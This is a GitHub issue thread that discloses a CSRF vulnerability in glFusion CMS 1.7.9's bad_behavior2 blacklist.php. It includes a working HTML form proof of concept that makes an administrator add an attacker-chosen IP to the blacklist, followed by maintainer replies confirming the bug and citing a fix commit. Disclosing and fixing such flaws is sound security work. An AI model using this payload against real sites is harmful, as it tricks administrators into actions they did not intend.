### ISSUE TITLE
glFusion CMS 1.7.9 blacklist.php CSRF vulnerability

### ISSUE THREAD

**Issue by Topsec-bunney** [glFusion/glfusion#486]
**Attackers can construct blacklist IP addresses. Using the CSRF vulnerability to trick the administrator to click, can add a blacklist**

poc
```<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.255.130/glfusion-1.7.9/public_html/admin/plugins/bad_behavior2/blacklist.php" method="POST">
      <input type="hidden" name="mode" value="addsave" />
      <input type="hidden" name="bl&#95;type" value="spambot&#95;ip" />
      <input type="hidden" name="bl&#95;item" value="1&#46;1&#46;1&#46;121" />
      <input type="hidden" name="ban&#95;reason" value="ipbrute" />
      <input type="hidden" name="submit" value="Submit" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```

![notepad++_aEpevZ9pjv](https://user-images.githubusercontent.com/73220685/145350666-12f5f950-a189-4add-a411-8df970256d57.png)
![firefox_k6jJMk5luW](https://user-images.githubusercontent.com/73220685/145350680-0eff78e1-e538-4b3c-95fa-504cbff0cef2.png)

**Comment by leegarner** [comment]
I can duplicate this, we should just need to add the CSRF token to the
blacklist (and other) process. Thanks.

**Comment by mark0263** [comment]
Adding CSRF support for blacklist entry / edit.

**Comment by mark0263** [comment]
Fixed with b380eada6647b2cccd94ab24aa744521b4d588af
